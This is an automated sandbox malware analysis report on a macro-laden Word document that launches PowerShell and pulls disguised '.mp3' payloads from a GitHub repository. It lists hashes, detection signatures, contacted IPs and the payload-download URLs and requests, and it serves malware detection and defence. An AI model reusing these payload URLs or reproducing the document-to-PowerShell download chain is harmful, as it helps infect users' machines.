Windows Analysis Report RfORrHIRNe.doc

Overview

General Information

Sample Name: RfORrHIRNe.doc
Analysis ID: 515215
MD5: 955d5d2855b291a3cf1fc6655bbbbb79
SHA1: b58901cf8967310228bc6e4c224b2cfaf014bc65
SHA256: 63acfd6633bf3fe6462d8de72904338e2a97392654d8b39a97d18b9e7f3b25b8
Infos:

Most interesting Screenshot:

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Found detection on Joe Sandbox Cloud Basic with higher score
Antivirus detection for dropped file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Machine Learning detection for sample
Powershell drops PE file
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Document contains no OLE stream with summary information
Drops files with a non-matching file extension (content does not match file extension)
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: RfORrHIRNe.doc Virustotal: Detection: 49% Perma Link
Antivirus / Scanner detection for submitted sample
Source: RfORrHIRNe.doc Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\~DFF551811DB4F781F3.TMP Avira: detection malicious, Label: HEUR/Macro.Agent
Machine Learning detection for sample
Source: RfORrHIRNe.doc Joe Sandbox ML: detected

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49754 version: TLS 1.0
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49755 version: TLS 1.0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: github.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.7:49753 -> 140.82.121.3:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.7:49754 -> 140.82.121.3:443

Networking:

barindex
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/main/5.mp3 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49754 version: TLS 1.0
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49755 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/2.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: github.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/main/2.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/2.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: github.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/3.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: github.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/4.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: github.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: powershell.exe, 00000003.00000003.341694746.0000000008910000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsof
Source: powershell.exe, 00000003.00000002.556594505.0000000005261000.00000004.00000001.sdmp String found in binary or memory: http://github.com
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36/stv/raw/main/2.mp3
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36/stv/raw/main/3.mp3
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36/stv/raw/main/4.mp3
Source: PowerShell_transcript.141700.Lg6KA_8X.20211104015721.txt.3.dr String found in binary or memory: http://github.com/ssbb36/stv/raw/main/5.mp3
Source: powershell.exe, 00000003.00000002.557346076.00000000056A8000.00000004.00000001.sdmp String found in binary or memory: http://go.micros
Source: powershell.exe, 00000003.00000002.558226568.0000000006182000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000003.00000002.556594505.0000000005261000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.556042753.0000000005121000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000003.00000002.556594505.0000000005261000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.aadrm.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.cortana.ai
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.office.net
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.onedrive.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://augloop.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cdn.entity.
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: powershell.exe, 00000003.00000002.558226568.0000000006182000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.558226568.0000000006182000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.558226568.0000000006182000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cortana.ai
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cortana.ai/api
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cr.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://directory.services.
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000003.00000002.556594505.0000000005261000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/ssbb36/stv/raw/main/1.mp3
Source: powershell.exe, 00000003.00000002.556715465.0000000005363000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/ssbb36/stv/raw/main/4.mp3
Source: powershell.exe, 00000003.00000002.556696783.000000000535C000.00000004.00000001.sdmp String found in binary or memory: https://github.com/ssbb36/stv/raw/main/5.mp3
Source: powershell.exe, 00000003.00000002.556696783.000000000535C000.00000004.00000001.sdmp String found in binary or memory: https://github.com4
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000003.00000002.557922346.0000000005917000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://graph.windows.net
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://graph.windows.net/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://login.windows.local
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://management.azure.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://management.azure.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://messaging.office.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://ncus.contentsync.
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000003.00000002.558226568.0000000006182000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://officeapps.live.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://onedrive.live.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://osi.office.net
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://outlook.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://outlook.office.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://outlook.office365.com
